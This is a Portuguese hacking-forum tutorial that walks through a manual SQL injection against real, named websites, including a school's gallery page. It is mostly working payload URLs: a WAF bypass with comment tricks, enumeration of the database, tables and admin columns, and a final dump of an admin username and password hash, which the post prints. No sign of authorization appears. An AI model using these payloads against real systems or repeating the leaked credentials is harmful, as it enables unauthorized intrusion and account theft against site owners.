COVIL HACKER

, ! .


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Manual Blind SQL Injection Aula-Exemplo #2


Manual Blind SQL Injection Aula-Exemplo #2

1 2 2

1

vou tratar dos sites onde podemos ganhar experiência em Manuel Sql Injection, do simples ao difícil... Cada site significa uma nova informação, uma nova experiência.

Blind SQL Injection: Blind SQL Injection (ou seja, Blind) Sql injection é para interromper a estrutura da página sem dar uma saída de erro na página da Web. Por exemplo, vamos considerar uma página simples com um img no meio e um artigo descrevendo o img abaixo isto. Digamos .php?id=xx em nossa página. Quando colocamos o caractere .php?id=xx'(quote), ele não mostra img naquela página, ou não mostra img mas não texto. ou se não mostrar uma parte do artigo, pode haver uma vulnerabilidade de Blind SQL Injection nesta página da web.

Nosso site com amostra Blind SQL Injection;

Código:

http://www.marywardlubhu.edu.np/gallery.php?cat_id=6

https://forumupload.ru/uploads/001b/c9/09/2/t504110.webp

Quando colocamos "'" (aspas);

Código:

http://www.ise.ac/index.php?ID=11'

https://forumupload.ru/uploads/001b/c9/09/2/t358596.webp

Olha, as fotos e os textos não vieram, agora vamos descobrir o número de colunas, como :)
sabemos, amigos, quando vamos via /index.php?ID=11'+order+by+1, a página não nos recebe corretamente, para isso adicionamos (URL BALANCER) --+- bypass. .

Código:

http://www.ise.ac/index.php?ID=11'+order+by+1--+-

https://forumupload.ru/uploads/001b/c9/09/2/t630518.webp

Sim, a página está carregada normalmente agora, vamos aumentando uma a uma até que as imagens e textos não estejam na página como antes. Precisamos encontrar o número de colunas.

Código:

http://www.marywardlubhu.edu.np/gallery … r+by+7--+-

Em 7, img e textos não vieram, então nosso número de coluna é 6
Agora vamos refletir nossas colunas fracas...

https://forumupload.ru/uploads/001b/c9/09/2/t93748.webp

Código:

http://www.marywardlubhu.edu.np/gallery … ,4,5,6--+-

https://forumupload.ru/uploads/001b/c9/09/2/t209511.webp


Sim, temos um WAF.
Vamos ignorar o WAF e seguir em frente.

Código:

http://www.marywardlubhu.edu.np/gallery … ,4,5,6--+-

https://forumupload.ru/uploads/001b/c9/09/2/t650940.webp

Normalmente ele deveria dar nosso cólon fraco, mas não o fez. Agora vamos adicionar um apóstrofo (-) à esquerda de 6

Código

http://www.marywardlubhu.edu.np/gallery … ,4,5,6--+-

https://forumupload.ru/uploads/001b/c9/09/2/t253043.webp

Sim, agora trouxe nossas colunas fracas. Nossas 4 e 1 colunas fracas. Vou continuar com 4.

Código:

http://www.marywardlubhu.edu.np/gallery … 3,database(),5,6--+-

https://forumupload.ru/uploads/001b/c9/09/2/t168690.webp

Sim, o nome do nosso banco de dados é maryward_maryward. Vamos continuar com nossas operações clássicas.

Código:

http://www.marywardlubhu.edu.np/gallery … T*/+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x6d617279776172645f6d61727977617264),5,6--+-

https://forumupload.ru/uploads/001b/c9/09/2/t203552.webp

Sim, tenho minhas tabelas, vou precisar de tbl_admin daqui. Vou puxar minhas colunas agora.

Código:

http://www.marywardlubhu.edu.np/gallery … T*/+1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),5,6--+-

https://forumupload.ru/uploads/001b/c9/09/2/t207936.webp

Sim, como você pode ver, ele me deu minhas colunas em tbl_admin. Agora o que eu preciso aqui é nome de usuário e senha. Vamos aprender isso. Amigos, nesta fase, não aconteceu quando tentei contato em grupo, mas quando dei uma tacada, deu-me o nome de usuário e a senha. Dependendo da situação, isso pode mudar em suas ações.

Código:
http://www.marywardlubhu.edu.np/gallery … T*/+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(maryward_maryward.tbl_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,password,0x3c62723e))))x),5,6--+-

https://forumupload.ru/uploads/001b/c9/09/2/t315425.webp

Sim, como você pode ver, ele me deu o nome de usuário e a senha em um hash. Descarregamos o site com sucesso.

Nome de usuário: M#&*5$#ExQ!-+
Senha: 20e041a68eefa994cc7dd29bc2235dc0

0

2


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Manual Blind SQL Injection Aula-Exemplo #2


|